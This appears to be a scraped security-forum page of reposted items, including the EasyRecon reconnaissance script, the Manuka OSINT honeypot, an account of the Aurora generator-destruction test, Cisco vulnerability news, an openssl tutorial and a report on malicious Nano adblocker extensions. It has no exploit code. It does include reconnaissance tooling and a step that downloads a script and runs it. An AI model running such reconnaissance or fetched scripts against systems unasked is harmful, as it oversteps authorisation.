fixed in the updated version. Our best advice is to keep calm, and make sure you update your open source software components. Via whitesourcesoftware.com
-
https://octopus.com/blog/public-bug-bounty
-
Se merita investitia in energii alternative pentru mining BTC?
Kev replied to ardu2222's topic in Electronica
dude, sunt cel putin 10 autoturisme hybrid intr-un oras cu cateva k de locuitori, le poti inveli in celule pana la urmatoarea statie -
EasyRecon is a script that do the initial reconnaissance of target automatically. To scan Google, simply run: $ ./easyRecon.sh google.com Setup To install EasyRecon, clone this repository. EasyRecon relies on a couple of tools to be installed so make sure you have them: subfinder httprobe waybackurls Please make sure that as most of these tools are written in Go, that you have Go installed and configured properly. Make sure that when you type any of the above commands in the terminal, they are recognized and work. Usage $ ./easyRecon.sh example.com Features Enumerate all the existing domains with subfinder Seperate live domains from all existing domains httprobe Spider the target and save all the URLS of target using waybackurls grep all the js files and endpoints from the target Download easyrecon-main.zip or git clone https://github.com/cspshivam/easyrecon.git Source
- 1 reply
-
- 2
-
“Petrochemical plant” The Treasury Department for the first time levied sanctions for an ICS cyberattack. (CC BY-NC-ND 2.0) The Treasury Department’s Office of Foreign Assets Control sanctioned a Russian government research institution linked to Triton malware targeting industrial safety systems, the first time the U.S. took such an action for an industrial control system attack. Treasury Secretary Steve Mnuchin called out the Russian government for continuing “to engage in dangerous cyber activities aimed at the U.S. and its allies.” The State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics built the tools behind a 2017 Triton attack on a petrochemical facility in the Middle East. The malware, also known as Trisis and Hatman, has been used against U.S. partners in the Middle East, and the agency said in a release that Triton hackers have been reportedly scanning and probing U.S. facilities. “An OFAC sanction by the U.S. Treasury is significant and compelling; not only will it impact this research institution in Russia, but anyone working with them will have their ability to be successful on the international stage severely hampered,” said Robert Lee, CEO and co-founder of Dragos, Inc. “The most important aspect of this development, however, is the attribution to Russia for the Trisis attack by the USG officially and the explicit call out of industrial control systems in the sanction,” said Lee. “This is a norm setting moment and the first time an ICS cyberattack has ever been sanctioned.” He called the sanction “entirely appropriate” since the cyberattack on the petrochemical attack “was the first ever targeted explicitly towards human life. We are fortunate no one died and I’m glad to see governments take a strong stance condemning such attacks.” Via scmagazine.com
-
nu se mai practica de ani buni copile, e ipv6 acum, poti sa ai in dictionar si pe mama:si:pe:tata, apuca-te de munca si lasa blariile
-
Description Manuka is an Open-source intelligence (OSINT) honeypot that monitors reconnaissance attempts by threat actors and generates actionable intelligence for Blue Teamers. It creates a simulated environment consisting of staged OSINT sources, such as social media profiles and leaked credentials, and tracks signs of adversary interest, closely aligning to MITRE’s PRE-ATT&CK framework. Manuka gives Blue Teams additional visibility of the pre-attack reconnaissance phase and generates early-warning signals for defenders. Although they vary in scale and sophistication, most traditional honeypots focus on networks. These honeypots uncover attackers at Stage 2 (Weaponization) to 7 (Actions on Objectives) of the cyber kill chain, with the assumption that attackers are already probing the network. Manuka conducts OSINT threat detection at Stage 1 (Reconnaissance) of the cyber kill chain. Despite investing millions of dollars into network defenses, organisations can be easily compromised through a single Google search. One recent example is hackers exposing corporate meetings, therapy sessions, and college classes through Zoom calls left on the open Web. Enterprises need to detect these OSINT threats on their perimeter but lack the tools to do so. Manuka is built to scale. Users can easily add new listener modules and plug them into the Dockerized environment. They can coordinate multiple campaigns and honeypots simultaneously to broaden the honeypot surface. Furthermore, users can quickly customize and deploy Manuka to match different use cases. Manuka’s data is designed to be easily ported to other third-party analysis and visualization tools in an organisation’s workflow. Designing an OSINT honeypot presents a novel challenge due to the complexity and wide range of OSINT techniques. However, such a tool would allow Blue Teamers to “shift left” in their cyber threat intelligence strategy. Dashboard Tool Design Architecture Manuka is built on the following key terms and processes. Sources: Possible OSINT vectors such as social media profiles, exposed credentials, and leaked source code. Listeners: Servers that monitor sources for interactions with attackers. Hits: Indicators of interest such as attempted logins with leaked credentials and connections on social media. Honeypots: Groups of sources and listeners that are organized into a single Campaign which analyzes and tracks hits over time. System Design The framework itself consists of several Docker containers which can be deployed on a single host. manuka-server: Central Golang server that performs CRUD operations and ingests hits from listeners. manuka-listener: Modular Golang server that can perform different listener roles. manuka-client: React dashboard for Blue Team to manage Manuka’s resources. These containers are orchestrated through a single docker-compose command. Development In development, the components run on the following ports in their respective containers: manuka-client: 3000 manuka-server: 8080 manuka-listener: 8080 To allow for the client and server to talk without CORS issues, an additional nginx layer on localhost:8080 proxy-passes /api/ to manuka-server amd / to manuka-listener. In addition, manuka-listener operates on the following ports: 8081 for the staged login webpage 8082 for interacting with the staged email Requirements See the individual component repositories for their requirements. docker >= 19.03.8 docker-compose >= 1.25.4 ngok >= 2.3.35 Configure Create a file in docker/secrets/postgres_password with the password for Postgres. Setup Google account for Gmail to receive emails from social media profiles. Setup Google Cloud Pub/Sub on https://console.cloud.google.com/cloudpubsub for push email functionality (guide: https://developers.google.com/gmail/api/guides/push). The guide will have instructions to create a Cloud project too. Create file docker/secrets/google_credentials.json with your project's credentials. Add the topic created on Cloud Pub/Sub to docker/secrets/google_topic. Obtain an oauth2 token for your Google account. Manuka requires an oauth2 token the first time it is run. Subsequently, it will automatically refresh the token. Save the token in docker/secrets/google_oauth2_token.json. Run docker-compose -f docker-compose.yml -f docker-compose-dev.yml up --build --remove-orphans Initialize manuka-listener gmail push service: Initialize ngok ./ngok http <manuka-listener port> and take note of the https URL. On Google PubSub dashboard left-hand menu, go to Subscriptions -> <subscription name> -> Edit Subscription and change the Endpoint URL to <ngok https URL>/notifications. Try sending an email from another account to the target Gmail account. You should see POST /notifications 200 OK on the ngrok console, and Received push notification on the Currently Supported Listeners 1. Social Listener Monitors for social activities on Facebook and LinkedIn. Currently supports notification of network connection attempts. Note that the monitored social media account(s) should have email notification enabled. The corresponding email account(s) receiving the email notifications from the social media platforms should be configured to forward these emails to the centralised gmail account. 2. Login Listener Monitors for attempted login using leaked credentials on the honeypot site. Download: manuka-master.zip or git clone https://github.com/spaceraccoon/manuka.git Source
-
- 1
-
This app allows you to simulate how any origami crease pattern will fold. It may look a little different from what you typically think of as "origami" - rather than folding paper in a set of sequential steps, this simulation attempts to fold every crease simultaneously. It does this by iteratively solving for small displacements in the geometry of an initially flat sheet due to forces exerted by creases. You can read more about it in our paper: Fast, Interactive Origami Simulation using GPU Computation by Amanda Ghassaei, Erik Demaine, and Neil Gershenfeld (7OSME) All simulation methods were written from scratch and are executed in parallel in several GPU fragment shaders for fast performance. The solver extends work from the following sources: Origami Folding: A Structural Engineering Approach by Mark Schenk and Simon D. Guest Freeform Variations of Origami by Tomohiro Tachi Built by Amanda Ghassaei as a final project for Geometric Folding Algorithms. Code available on Github. If you have interesting crease patterns that would make good demo files, please send them to me (Amanda) so I can add them to the Examples menu. My email address is on my website. Thanks! Instructions: Slide the Fold Percent slider to control the degree of folding of the pattern (100% is fully folded, 0% is unfolded, and -100% is fully folded with the opposite mountain/valley assignments). Drag to rotate the model, scroll to zoom. Import other patterns under the Examples menu. Upload your own crease patterns in SVG or FOLD formats, following these instructions. Export FOLD files or 3D models ( STL or OBJ ) of the folded state of your design ( File > Save Simulation as... ). Visualize the internal strain of the origami as it folds using the Strain Visualization in the left menu of the Advanced Options. If you are working from a computer connected to a VR headset and hand controllers, follow these instructions to use this app in an interactive virtual reality mode. External Libraries: All rendering and 3D interaction done with three.js path-data-polyfill helps with SVG path parsing FOLD is used as the internal data structure, methods from the FOLD API used for SVG parsing Arbitrary polygonal faces of imported geometry are triangulated using the Earcut Library Portability to multiple VR controllers by THREE.VRController.js VR GUI by dat.guiVR numeric.js for linear algebra operations FileSaver for client-side file saving GIF and WebM video export uses CCapture jQuery, Bootstrap, and the Flat UI theme used to build the regular GUI You can find additional information in our 7OSME paper and this website. Source: origamisimulator.org
- 1 reply
-
- 1
-
The last major release of the X.Org Server was in May 2018 but don't expect the long-awaited X.Org Server 1.21 to actually be released anytime soon. This should hardly be surprising but a prominent Intel open-source developer has conceded that the X.Org Server is pretty much "abandonware" with Wayland being the future. This comes as X.Org Server development hits a nearly two decade low, the X.Org Server is well off its six month release regiment in not seeing a major release in over two years, and no one is stepping up to manage the 1.21 release. A year ago was a proposal to see new releases driven via continuous integration testing but even that didn't take flight and as we roll into 2021 there isn't any motivation for releasing new versions of the X.Org Server by those capable of doing so. Red Hat folks have long stepped up to manage X.Org Server releases but with Fedora Workstation using Wayland by default and RHEL working that way, they haven't been eager to devote resources to new X.Org Server releases. Other major stakeholders also have resisted stepping up to ship 1.21 or commit any major resources to new xorg-server versions. This week was a tentative merge request for allowing atomic support in the xf86-video-modesetting DDX. It's actually about partially restoring the support (and not enabled by default) after the atomic code was previously disabled over bugs. Daniel Vetter of Intel's kernel graphics driver team and DRM co-maintainer commented, (Then again, that coming from an Intel Linux developer isn't too surprising considering it's been more than six years since the last xf86-video-intel DDX release.) Besides the likes of Red Hat, Intel has been the only other major organization in recent time willing to devote resources to areas like X.Org release management, but even while they let go some of their Wayland folks years ago, they seem uninterested in devoting much in the way of the X.Org Server advancements as we approach 2021. With Ubuntu 21.04 also possibly defaulting to Wayland for its GNOME session, the KDE Wayland support getting squared away, and other advancements continuing, X.Org Server 1.21 may very well prove to be an elusive release. Via phoronix.com
-
A secret experiment in 2007 proved that hackers could devastate power grid equipment beyond repair—with a file no bigger than a gif. A control room in an Idaho National Labs facility.PHOTOGRAPH: JIM MCAULEY/THE NEW YORK TIMES/REDUX EARLIER THIS WEEK, the US Department of Justice unsealed an indictment against a group of hackers known as Sandworm. The document charged six hackers working for Russia's GRU military intelligence agency with computer crimes related to half a decade of cyberattacks across the globe, from sabotaging the 2018 Winter Olympics in Korea to unleashing the most destructive malware in history in Ukraine. Among those acts of cyberwar was an unprecedented attack on Ukraine's power grid in 2016, one that appeared designed to not merely cause a blackout, but to inflict physical damage on electric equipment. And when one cybersecurity researcher named Mike Assante dug into the details of that attack, he recognized a grid-hacking idea invented not by Russian hackers, but by the United State government, and tested a decade earlier. The following excerpt from the book SANDWORM: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers, published in paperback this week, tells the story of that early, seminal grid-hacking experiment. The demonstration was led by Assante, the late, legendary industrial control systems security pioneer. It would come to be known as the Aurora Generator Test. Today, it still serves as a powerful warning of the potential physical-world effects of cyberattacks—and an eery premonition of Sandworm's attacks to come. ON A PIERCINGLY cold and windy morning in March 2007, Mike Assante arrived at an Idaho National Laboratory facility 32 miles west of Idaho Falls, a building in the middle of a vast, high desert landscape covered with snow and sagebrush. He walked into an auditorium inside the visitors’ center, where a small crowd was gathering. The group included officials from the Department of Homeland Security, the Department of Energy, and the North American Electric Reliability Corporation (NERC), executives from a handful of electric utilities across the country, and other researchers and engineers who, like Assante, were tasked by the national lab to spend their days imagining catastrophic threats to American critical infrastructure. At the front of the room was an array of video monitors and data feeds, set up to face the room’s stadium seating, like mission control at a rocket launch. The screens showed live footage from several angles of a massive diesel generator. The machine was the size of a school bus, a mint green, gargantuan mass of steel weighing 27 tons, about as much as an M3 Bradley tank. It sat a mile away from its audience in an electrical substation, producing enough electricity to power a hospital or a navy ship and emitting a steady roar. Waves of heat coming off its surface rippled the horizon in the video feed’s image. Assante and his fellow INL researchers had bought the generator for $300,000 from an oil field in Alaska. They’d shipped it thousands of miles to the Idaho test site, an 890-square-mile piece of land where the national lab maintained a sizable power grid for testing purposes, complete with 61 miles of transmission lines and seven electrical substations. Now, if Assante had done his job properly, they were going to destroy it. And the assembled researchers planned to kill that very expensive and resilient piece of machinery not with any physical tool or weapon but with about 140 kilobytes of data, a file smaller than the average cat GIF shared today on Twitter. THREE YEARS EARLIER, Assante had been the chief security officer at American Electric Power, a utility with millions of customers in 11 states from Texas to Kentucky. A former navy officer turned cybersecurity engineer, Assante had long been keenly aware of the potential for hackers to attack the power grid. But he was dismayed to see that most of his peers in the electric utility industry had a relatively simplistic view of that still-theoretical and distant threat. If hackers did somehow get deep enough into a utility’s network to start opening circuit breakers, the industry’s common wisdom at the time was that staff could simply kick the intruders out of the network and flip the power back on. “We could manage it like a storm,” Assante remembers his colleagues saying. “The way it was imagined, it would be like an outage and we’d recover from the outage, and that was the limit of thinking around the risk model.” But Assante, who had a rare level of crossover expertise between the architecture of power grids and computer security, was nagged by a more devious thought. What if attackers didn’t merely hijack the control systems of grid operators to flip switches and cause short-term blackouts, but instead reprogrammed the automated elements of the grid, components that made their own decisions about grid operations without checking with any human? An electrical substation at Idaho National Labs’ sprawling, 890-square-mile test site. COURTESY OF IDAHO NATIONAL LABORATORY In particular, Assante had been thinking about a piece of equipment called a protective relay. Protective relays are designed to function as a safety mechanism to guard against dangerous physical conditions in electric systems. If lines overheat or a generator goes out of sync, it’s those protective relays that detect the anomaly and open a circuit breaker, disconnecting the trouble spot, saving precious hardware, even preventing fires. A protective relay functions as a kind of lifeguard for the grid. But what if that protective relay could be paralyzed—or worse, corrupted so that it became the vehicle for an attacker’s payload? That disturbing question was one Assante had carried over to Idaho National Laboratory from his time at the electric utility. Now, in the visitor center of the lab’s test range, he and his fellow engineers were about to put his most malicious idea into practice. The secret experiment was given a code name that would come to be synonymous with the potential for digital attacks to inflict physical consequences: Aurora. THE TEST DIRECTOR read out the time: 11:33 a.m. He checked with a safety engineer that the area around the lab’s diesel generator was clear of bystanders. Then he sent a go-ahead to one of the cybersecurity researchers at the national lab’s office in Idaho Falls to begin the attack. Like any real digital sabotage, this one would be performed from miles away, over the internet. The test’s simulated hacker responded by pushing roughly thirty lines of code from his machine to the protective relay connected to the bus-sized diesel generator. The inside of that generator, until that exact moment of its sabotage, had been performing a kind of invisible, perfectly harmonized dance with the electric grid to which it was connected. Diesel fuel in its chambers was aerosolized and detonated with inhuman timing to move pistons that rotated a steel rod inside the generator’s engine—the full assembly was known as the “prime mover”—roughly 600 times a minute. That rotation was carried through a rubber grommet, designed to reduce any vibration, and then into the electricity-generating components: a rod with arms wrapped in copper wiring, housed between two massive magnets so that each rotation induced electrical current in the wires. Spin that mass of wound copper fast enough, and it produced 60 hertz of alternating current, feeding its power into the vastly larger grid to which it was connected. A protective relay attached to that generator was designed to prevent it from connecting to the rest of the power system without first syncing to that exact rhythm: 60 hertz. But Assante’s hacker in Idaho Falls had just reprogrammed that safeguard device, flipping its logic on its head. At 11:33 a.m. and 23 seconds, the protective relay observed that the generator was perfectly synced. But then its corrupted brain did the opposite of what it was meant to do: It opened a circuit breaker to disconnect the machine. When the generator was detached from the larger circuit of Idaho National Laboratory’s electrical grid and relieved of the burden of sharing its energy with that vast system, it instantly began to accelerate, spinning faster, like a pack of horses that had been let loose from its carriage. As soon as the protective relay observed that the generator’s rotation had sped up to be fully out of sync with the rest of the grid, its maliciously flipped logic immediately reconnected it to the grid’s machinery. The moment the diesel generator was again linked to the larger system, it was hit with the wrenching force of every other rotating generator on the grid. All of that equipment pulled the relatively small mass of the diesel generator’s own spinning components back to its original, slower speed to match its neighbors’ frequencies. On the visitor center’s screens, the assembled audience watched the giant machine shake with sudden, terrible violence, emitting a sound like a deep crack of a whip. The entire process from the moment the malicious code had been triggered to that first shudder had spanned only a fraction of a second. Black chunks began to fly out of an access panel on the generator, which the researchers had left open to watch its internals. Inside, the black rubber grommet that linked the two halves of the generator’s shaft was tearing itself apart. A few seconds later, the machine shook again as the protective relay code repeated its sabotage cycle, disconnecting the machine and reconnecting it out of sync. This time a cloud of gray smoke began to spill out of the generator, perhaps the result of the rubber debris burning inside it. Assante, despite the months of effort and millions of dollars in federal funds he’d spent developing the attack they were witnessing, somehow felt a kind of sympathy for the machine as it was being torn apart from within. “You find yourself rooting for it, like the little engine that could,” Assante remembered. “I was thinking, ‘You can make it!’ ” The machine did not make it. After a third hit, it released a larger cloud of gray smoke. “That prime mover is toast,” an engineer standing next to Assante said. After a fourth blow, a plume of black smoke rose from the machine thirty feet into the air in a final death rattle. The test director ended the experiment and disconnected the ruined generator from the grid one final time, leaving it deathly still. In the forensic analysis that followed, the lab’s researchers would find that the engine shaft had collided with the engine’s internal wall, leaving deep gouges in both and filling the inside of the machine with metal shavings. On the other side of the generator, its wiring and insulation had melted and burned. The machine was totaled. In the wake of the demonstration, a silence fell over the visitor center. “It was a sober moment,” Assante remembers. The engineers had just proven without a doubt that hackers who attacked an electric utility could go beyond a temporary disruption of the victim’s operations: They could damage its most critical equipment beyond repair. “It was so vivid. You could imagine it happening to a machine in an actual plant, and it would be terrible,” Assante says. “The implication was that with just a few lines of code, you can create conditions that were physically going to be very damaging to the machines we rely on.” But Assante also remembers feeling something weightier in the moments after the Aurora experiment. It was a sense that, like Robert Oppenheimer watching the first atomic bomb test at another U.S. national lab six decades earlier, he was witnessing the birth of some- thing historic and immensely powerful. Via wired.com
-
Microsoft has unveiled a new open-source "matrix" that hopes to identify all the existing attacks that threaten the security of machine learning applications. Image: securitylab.ru Microsoft and non-profit research organization MITRE have joined forces to accelerate the development of cyber-security's next chapter: to protect applications that are based on machine learning and are at risk of new adversarial threats. The two organizations, in collaboration with academic institutions and other big tech players such as IBM and Nvidia, have released a new open-source tool called the Adversarial Machine Learning Threat Matrix. The framework is designed to organize and catalogue known techniques for attacks against machine learning systems, to inform security analysts and provide them with strategies to detect, respond and remediate against threats. The matrix classifies attacks based on criteria related to various aspects of the threat, such as execution and exfiltration, but also initial access and impact. To curate the framework, Microsoft and MITRE's teams analyzed real-world attacks carried out on existing applications, which they vetted to be effective against AI systems. With AI systems increasingly underpinning our everyday lives, the tool seems timely. From finance to healthcare, through defense and critical infrastructure, the applications of machine learning have multiplied in the past few years. But MITRE's researchers argue that while eagerly accelerating the development of new algorithms, organizations have often failed to scrutinize the security of their systems. Surveys increasingly point to the lack of understanding within industry of the importance of securing AI systems against adversarial threats. Companies like Google, Amazon, Microsoft and Tesla, in fact, have all seen their machine learning systems tricked in one way or the other in the past three years. Algorithms are prone to mistakes, therefore, and especially so when they are influenced by the malicious interventions of bad actors. In a separate study, a team of researchers recently ranked the potential criminal applications that AI will have in the next 15 years; among the list of highly-worrying prospects, was the opportunity for attack that AI systems constitute when algorithms are used in key applications like public safety or financial transactions. As MITRE and Microsoft's researchers note, attacks can come in many different shapes and forms. Threats go all the way from a sticker placed on a sign to make an automated system in a self-driving car make the wrong decision, to more sophisticated cybersecurity methods going by specialized names, like evasion, data poisoning, trojaning or backdooring. Centralizing the various aspects of all the methods that are known to effectively threaten machine learning applications in a single matrix, therefore, could go a long way in helping security experts prevent future attacks on their systems. MITRE's researchers are hoping to gather more information from ethical hackers, thanks to a well-established cybersecurity method known as red teaming. The idea is to have teams of benevolent security experts finding ways to crack vulnerabilities ahead of bad actors, to feed into the existing database of attacks and expand overall knowledge of the possible threats. Microsoft and MITRE both have their own Red Teams, and they have already demonstrated some of the attacks that were used to feed into the matrix as it is. They include, for example, evasion attacks on machine-learning models, which can modify the input data to induce targeted misclassification. Via zdnet.com
-
- 1
-
Installation pip install multiplex # or better yet pipx install multiplex Python 3.7 or greater is required. Examples Parallel Execution Of Commands mp \ './some-long-running-process.py --zone z1' \ './some-long-running-process.py --zone z2' \ './some-long-running-process.py --zone z3' You can achive the same effect using Python API like this: from multiplex import Multiplex mp = Multiplex() for zone in ['z1', 'z2', 'z3']: mp.add(f"./some-long-running-process.py --zone {zone}") mp.run() Dynamically Add Commands my-script.sh: #!/bin/bash -e echo Hello There export REPO='git@github.com:dankilman/multiplex.git' mp 'git clone $REPO' mp 'pyenv virtualenv 3.8.5 multiplex-demo && pyenv local multiplex-demo' cd multiplex mp 'poetry install' mp 'pytest tests' mp @ Goodbye -b 0 And then running: mp ./my-script.sh -b 7 Python Controller An output similar to the first example can be achieved from a single process using the Python Controller API. import random import time import threading from multiplex import Multiplex, Controller CSI = "\033[" RESET = CSI + "0m" RED = CSI + "31m" GREEN = CSI + "32m" BLUE = CSI + "34m" MAG = CSI + "35m" CYAN = CSI + "36m" mp = Multiplex() controllers = [Controller(f"zone z{i+1}", thread_safe=True) for i in range(3)] for controller in controllers: mp.add(controller) def run(index, c): c.write( f"Starting long running process in zone {BLUE}z{index}{RESET}, " f"that is not really long for demo purposes\n" ) count1 = count2 = 0 while True: count1 += random.randint(0, 1000) count2 += random.randint(0, 1000) sleep = random.random() * 3 time.sleep(sleep) c.write( f"Processed {RED}{count1}{RESET} orders, " f"total amount: {GREEN}${count2}{RESET}, " f"Time it took to process this batch: {MAG}{sleep:0.2f}s{RESET}, " f"Some more random data: {CYAN}{random.randint(500, 600)}{RESET}\n" ) for index, controller in enumerate(controllers): thread = threading.Thread(target=run, args=(index+1, controller)) thread.daemon = True thread.start() mp.run() Help Screen Type ? to toggle the help screen. Why Not Tmux? In short, they solve different problems. tmux is a full blown terminal emulator multiplexer. multiplex on the other hand, tries to optimize for a smooth experience in navigating output from several sources. tmux doesn't have any notion of scrolling panes. That is to say, the layout contains all panes at any given moment (unless maximized). In multiplex, current view will display boxes that fit current view, but you can have many more, and move around boxes using less inspired keys such as j, k, g, G, etc... Another aspect is that keybindigs for moving around are much more ergonomic (as they are in less) because multiplex is not a full terminal emulator, so it can afford using single letter keyboard bindings (e.g. g for go to beginning) Download multiplex-master.zip or git clone https://github.com/dankilman/multiplex.git Source
-
The majority of the bugs in Cisco’s Firepower Threat Defense (FTD) and Adaptive Security Appliance (ASA) software can enable denial of service (DoS) on affected devices. Cisco has stomped out a slew of high-severity vulnerabilities across its lineup of network-security products. The most severe flaws can be exploited by an unauthenticated, remote attacker to launch a passel of malicious attacks — from denial of service (DoS) to cross-site request forgery (CSRF). The vulnerabilities exist in Cisco’s Firepower Threat Defense (FTD) software, which is part of its suite of network-security and traffic-management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network-security devices. The most severe of these flaws includes a vulnerability in Cisco Firepower Chassis Manager (FCM), which exists in the Firepower Extensible Operating System (FXOS) and provides management capabilities. The flaw (CVE-2020-3456) ranks 8.8 out of 10 on the CVSS scale, and stems from insufficient CSRF protections in the FCM interface. It could be exploited to enable CSRF — which means that when attackers are authenticated on the server, they also have control over the client. Cisco FXOS Software is affected when it is running on Firepower 2100 Series Appliances (when running ASA Software in non-appliance mode), Firepower 4100 Series Appliances and Firepower 9300 Series Appliances. Four other high-severity vulnerabilities across Cisco’s Firepower brand could be exploited by an unauthenticated, remote attacker to cripple affected devices with a DoS condition. These include a flaw in Firepower’s Management Center Software (CVE-2020-3499), Cisco Firepower 2100 Series firewalls (CVE-2020-3562), Cisco Firepower 4110 appliances (CVE-2020-3571) and Cisco Firepower Threat Defense Software (CVE-2020-3563 and CVE-2020-3563). Cisco also patched multiple DoS flaws in its Adaptive Security Appliance software, including ones tied to CVE-2020-3304, CVE-2020-3529, CVE-2020-3528, CVE-2020-3554, CVE-2020-3572 and CVE-2020-3373 that could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly. Another flaw of note, in the web services interface of Cisco Adaptive Security Appliance and Firepower Threat Defense, could allow an unauthenticated, remote attacker to upload arbitrary-sized files to specific folders on an affected device, which could lead to an unexpected device reload. The flaw stems from the software not efficiently handling the writing of large files to specific folders on the local file system. The new security alerts come a day after Cisco sent out an advisory warning that a flaw (CVE-2020-3118) the Cisco Discovery Protocol implementation for Cisco IOS XR Software was being actively exploited by attackers. The bug, which could be exploited by unauthenticated, adjacent attackers, could allow them to execute arbitrary code or cause a reload on an affected device. Via threatpost.com
-
How do I check the TLS/SSL certificate expiration date from my Linux or Unix shell prompt? How can I find the TLS certificate expiry date from Linux or Unix shell scripts? We can quickly solve TLS or SSL certificate issues by checking the certificate’s expiration from the command line. Let us see how to determine TLS or SSL certificate expiration date from a PEM encoded certificate file and live production website/domain name too when using Linux, *BSD, macOS or Unix-like system. How to check TLS/SSL certificate expiration date from command-line To check the SSL certificate expiration date, we are going to use the OpenSSL command-line client. OpenSSL client provides tons of data, including validity dates, expiry dates, who issued the TLS/SSL certificate, and much more. Check the expiration date of an SSL or TLS certificate Open the Terminal application and then run the following command: $ openssl s_client -servername {SERVER_NAME} -connect {SERVER_NAME}:{PORT} | openssl x509 -noout -dates $ echo | openssl s_client -servername {SERVER_NAME} -connect {SERVER_NAME}:{PORT} | openssl x509 -noout -dates Let us find out expiration date for www.nixcraft.com, enter: DOM="www.nixcraft.com" PORT="443" openssl s_client -servername $DOM -connect $DOM:$PORT \ | openssl x509 -noout -dates Sample outputs indicating dates and other information: depth=2 O = Digital Signature Trust Co., CN = DST Root CA X3 verify return:1 depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3 verify return:1 depth=0 CN = www.nixcraft.com verify return:1 notBefore=Sep 29 23:10:07 2020 GMT notAfter=Dec 28 23:10:07 2020 GMT Add the echo command to avoid pressing the CTRL+C. For instance: DOM="www.cyberciti.biz" PORT="443" ## note echo added ## echo | openssl s_client -servername $DOM -connect $DOM:$PORT \ | openssl x509 -noout -dates OpenSSL in action: Check the TLS/SSL certificate expiration date and time Understanding openssl command options The openssl is a very useful diagnostic tool for TLS and SSL servers. The openssl command-line options are as follows: s_client : The s_client command implements a generic SSL/TLS client which connects to a remote host using SSL/TLS. -servername $DOM : Set the TLS SNI (Server Name Indication) extension in the ClientHello message to the given value. -connect $DOM:$PORT : This specifies the host ($DOM) and optional port ($PORT) to connect to. x509 : Run certificate display and signing utility. -noout : Prevents output of the encoded version of the certificate. -dates : Prints out the start and expiry dates of a TLS or SSL certificate. Finding SSL certificate expiration date from a PEM encoded certificate file The syntax is as follows query the certificate file for when the TLS/SSL certifation will expire $ openssl x509 -enddate -noout -in {/path/to/my/my.pem} $ openssl x509 -enddate -noout -in /etc/nginx/ssl/www.cyberciti.biz.fullchain.cer.ecc $ openssl x509 -enddate -noout -in /etc/nginx/ssl/www.nixcraft.com.fullchain.cer notAfter=Dec 29 23:48:42 2020 GMT We can also check if the certificate expires within the given timeframe. For example, find out if the TLS/SSL certificate expires within next 7 days (604800 seconds): $ openssl x509 -enddate -noout -in my.pem -checkend 604800 # Check if the TLS/SSL cert will expire in next 4 months # openssl x509 -enddate -noout -in my.pem -checkend 10520000 Finding out whether the TLS/SSL certificate has expired or will expiery so within the next N days in seconds. Shell script to determine SSL certificate expiration date from the crt file itself and alert sysadmin Here is a sample shell script: #!/bin/bash # Purpose: Alert sysadmin/developer about the TLS/SSL cert expiry date in advance # Author: Vivek Gite {https://www.cyberciti.biz/} under GPL v2.x+ # ------------------------------------------------------------------------------- PEM="/etc/nginx/ssl/letsencrypt/cyberciti.biz/cyberciti.biz.fullchain.cer" # 7 days in seconds DAYS="604800" # Email settings _sub="$PEM will expire within $DAYS (7 days)." _from="system-account@your-dommain" _to="sysadmin@your-domain" _openssl="/usr/bin/openssl" $_openssl x509 -enddate -noout -in "$PEM" -checkend "$DAYS" | grep -q 'Certificate will expire' # Send email and push message to my mobile if [ $? -eq 0 ] then echo "${_sub}" mail -s "$_sub" -r "$_from" "$_to" <<< "Warning: The TLS/SSL certificate ($PEM) will expire soon on $HOSTNAME [$(date)]" # See https://www.cyberciti.biz/mobile-devices/android/how-to-push-send-message-to-ios-and-android-from-linux-cli/ # source ~/bin/cli_app.sh push_to_mobile "$0" "$_sub. See $_to email for detailed log. -- $HOSTNAME " >/dev/null fi See how to send push notifications to your phone from script. Of course, you need a working SMTP server to route email. At work we configured AWS SES with Postfix MTA to route all alert emails. See the following tutorials for more information about sending emails from the CLI: UNIX / Linux: Shell Scripting With mail Command Sending Email With Attachments From Unix / Linux Command [ Shell Prompt ] Howto: Send The Content Of a Text File Using mail Command In Unix / Linux Say hello to testssl and ssl-cert-check script We can use testssl shell script, which is a free command line tool which checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more. Download and run it as follows: $ wget https://testssl.sh/testssl.sh $ chmod +x testssl.sh $ testssl.sh --fast --parallel https://www.cyberciti.biz/ Another option is to run ssl-cert-check script, which is a Bourne shell script that can be used to report on expiring SSL certificates. The script was designed to be run from cron and can e-mail warnings or log alerts through nagios. Conclusion In this quick tutorial, you learned how to find the TLS/SSL certification expiration date from a PEM encoded certificate file, including live DNS name. Expired TLS/SSL certificates can cause downtime and confusion for end-users. Hence, it is crucial to monitor the expiry date for our TLS/SSL certificates. See the following man pages: $ man x509 $ man s_client Source
-
- 2
-
If you have Chromium versions of Nano Adblocker or Nano Defender, pay attention. Adblocking extensions with more than 300,000 active users have been surreptitiously uploading user browsing data and tampering with users’ social media accounts thanks to malware its new owner introduced a few weeks ago, according to technical analyses and posts on Github. Hugo Xu, developer of the Nano Adblocker and Nano Defender extensions, said 17 days ago that he no longer had the time to maintain the project and had sold the rights to the versions available in Google’s Chrome Web Store. Xu told me that Nano Adblocker and Nano Defender, which often are installed together, have about 300,000 installations total. Four days ago, Raymond Hill, maker of the uBlock Origin extension upon which Nano Adblocker is based, revealed that the new developers had rolled out updates that added malicious code. The first thing Hill noticed the new extension doing was checking if the user had opened the developer console. If it was opened, the extension sent a file titled "report" to a server at https://def.dev-nano.com/. “In simple words, the extension remotely checks whether you are using the extension dev tools—which is what you would do if you wanted to find out what the extension is doing,” he wrote. The most obvious change end users noticed was that infected browsers were automatically issuing likes for large numbers of Instagram posts, with no input from users. Cyril Gorlla, an artificial intelligence and machine learning researcher at the University of California in San Diego, told me that his browser liked more than 200 images from an Instagram account that didn’t follow anyone. The screenshot to the right shows some of the photos involved. Nano Adblocker and Nano Defender aren’t the only extensions that have been reported to tamper with Instagram accounts. User Agent Switcher, an extension that had more than 100,000 active users until Google removed it earlier this month is reported to have done the same thing. Many Nano extension users in this forum reported that their infected browsers were also accessing user accounts that weren’t already open in their browsers. This has led to speculation that the updated extensions are accessing authentication cookies and using them to gain access to the user accounts. Hill said he reviewed some of the added code and found that it was uploading data. Other users reported that sites other than Instagram were also being accessed and tampered with, in some cases, even when the user hadn’t accessed the site, but these claims couldn’t immediately be verified. Alexei, an Electronic Frontier Foundation senior staff technologist who works on the Privacy Badger extension, has been following the discussions 